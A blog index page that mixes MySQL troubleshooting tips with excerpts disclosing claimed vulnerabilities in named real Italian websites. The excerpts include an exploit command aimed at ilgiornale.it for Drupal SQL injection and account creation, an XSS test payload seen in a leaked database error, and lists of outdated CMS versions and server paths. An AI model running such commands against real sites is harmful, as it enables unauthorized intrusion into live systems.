Skip to main content

Posts

http://www.ilgiornale.it/ | sql injection, account creation

Drupal
sql injection and account creation
python 34992 -t http://www.ilgiornale.it/ -u dop -p dop

We can  raise an error to have more info






Drupal

PDOException: SQLSTATE[22001]: String data, right truncated: 1406 Data too long for column 'field_cap_value' at row 1: INSERT INTO {field_data_field_cap} (entity_type, entity_id, revision_id, bundle, delta, language, field_cap_value, field_cap_format) VALUES (:db_insert_placeholder_0, :db_insert_placeholder_1, :db_insert_placeholder_2, :db_insert_placeholder_3, :db_insert_placeholder_4, :db_insert_placeholder_5, :db_insert_placeholder_6, :db_insert_placeholder_7); Array ( [:db_insert_placeholder_0] => user [:db_insert_placeholder_1] => 140122 [:db_insert_placeholder_2] => 140122 [:db_insert_placeholder_3] => user [:db_insert_placeholder_4] => 0 [:db_insert_placeholder_5] => und [:db_insert_placeholder_6] => "><script>alert(1);</script><" [:db_ins…
Recent posts

[FIX] ERROR 1436 (HY000) Thread stack overrun - mysql 5.7

How to fix Thread stack overrun with mysql 5.7 (and other versions)
Thread stack overrun with mysql 5.7 on Linux and Windows Run the server with
mysqld --thread_stack=256k
to configure my.ini/my.cnf (server.cnf) add:

thread_stack = 256K


Further problems with mysql on windows On 64 bit (windows) probably you will need to give a bigger value
I've been forced to use
thread_stack = 512K on MySQL Ver 5.6.38 for Win64 on x86_64 (MySQL Community Server (GPL))






Generic errors with mysql_upgrade
ERROR 1436 (HY000) at line 1879: Thread stack overrun
ERROR 1436 (HY000) at line 1935

Use 'mysqld --thread_stack=#' to specify a bigger stack

How to log all the queries in mysql or mariadb - windows and linux

Log all your sql queries on mysql server Note: use only on your Test Server and without a lot of workload or connections othewise you are going to fill all your disk space or the IO resources (and even the CPU load to wait for IO writing).

Make sure that your logs folder exists and use the same folder of other mysql logs (ex. /var/log/mysql/)

Add in your my.ini/my.cnf (or server.cnf)


on Windows:
general_log_file="C:/yourWindowsMysql/logs/logsql.log"
general_log=1
on linux *unix add:
general_log_file="/var/log/mysqld-queries.log"
general_log=1

 restart your mysql or mariadb server



https://www.movimento5stelle.it again | several vulnerabilities, system compromise

Old vulnerabilities and other informations. The main website shares the same problems with http://rousseau.movimento5stelle.it.

NOTE/Disclaimer: if you are supposing to vote in a safe manner (It's less safe than the cheapest italian service provider with an old version of commoly used scripts, like wordpress or joomla, installed by your "cousin") I can tell you without problems that you are wrong and you've been tricked by your own leaders. I'm not responsible for what they are saying and doing ... you are.
The server mostly haven't been updated for years, except for just what they thought was worth updating.
Please, do not contact me for legal issues. I haven't saved/stored and I do not share any particular *confidential* information. I've nothing to do with any problem that you are facing on those websites.
No, I'm not "politically attacking" anybody. Those, that you are probably supposing, are political speculations from your respecti…

Reggia di caserta - SQL Injection, system compromise, xss, etc | http://www.reggiadicaserta.beniculturali.it

Joomla 1.5.15 (Vulnerable) http://www.reggiadicaserta.beniculturali.it
Archive.org: https://web.archive.org/web/20170426095201/http://reggiadicaserta.beniculturali.it:80/
They moved to: http://www.reggiadicaserta.beniculturali.it/Joomla/

path: /var/www/reggiadicaserta

They also have malwares (search in the source code http://www.freepokermoney.net or similar urls):

http://www.reggiadicaserta.beniculturali.it/Joomla/index.php?option=com_content&view=article&id=1434:codice-di-comportamento-dei-dipendenti-delle-pubbliche-amministrazioni&catid=212:organico-contatti&Itemid=886

Archived page:http://archive.is/3JJsi


Wordpress 4.8.3 (with bogus plugin and theme) http://www.reggiadicaserta.beniculturali.it/wp/




the wordpress version is the "new" website and they also "devastated" the, already bad (with malwares), seo optimization by not redirecting urls. I feel very sorry for that. What a mess.